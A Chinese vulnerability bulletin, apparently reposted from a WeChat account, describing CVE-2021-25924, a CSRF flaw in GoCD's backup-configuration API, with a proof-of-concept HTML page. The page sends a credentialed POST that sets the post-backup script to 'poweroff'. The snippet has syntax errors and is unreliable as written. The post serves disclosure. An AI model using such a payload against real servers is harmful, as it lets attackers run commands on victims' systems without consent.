新洞速递|CVE-2021-25924|POC

  • A+
所属分类:安全漏洞

概述

Aravind SV gocd是Aravind SV开源的一个应用程序。

在 GOCD 中,由于在"/go/api/配置/备份"端点缺少 CSRF 保护,19.6.0 到 21.1.0 版本容易受到跨站点请求伪造的影响。攻击者可以诱使受害者点击恶意链接,该链接可能会更改备份配置或在post_backup_script字段中执行系统命令。

细节

模块"GoCD"可能因缺少"/go/api/配置/备份"端点的CSRF保护而被跨站点请求伪造滥用。由于此缺陷,攻击者可以诱使受害者更改备份配置设置,例如在post_backup_script字段中执行系统命令,并通过诱使用户点击攻击者控制的网站来更改备份计划。

PoC 细节

创建具有以下内容的文件。当经过验证的用户单击攻击者发送的恶意链接时,CSRF 请求将发送到合法服务器并更改备份配置。

PoC 代码

<html> 
<script> function backup(
var xmlhttp = new XMLHttpRequest(); xmlhttp.withCredentials = true; xmlhttp.open("POST","http://localhost:8153/go/api/config/backup"true); 
xmlhttp.setRequestHeader("Accept","application/vnd.go.cd.v1+json"); 
xmlhttp.send(JSON.stringify({"schedule":null,"post_backup_script":"poweroff","email_on_success":false,"email_on_failure":false})); } 
backup();
</script> 
</html>

影响版本

19.6.0-21.1.0

原文链接

https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25924


原文始发于微信公众号(无级安全):新洞速递|CVE-2021-25924|POC

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: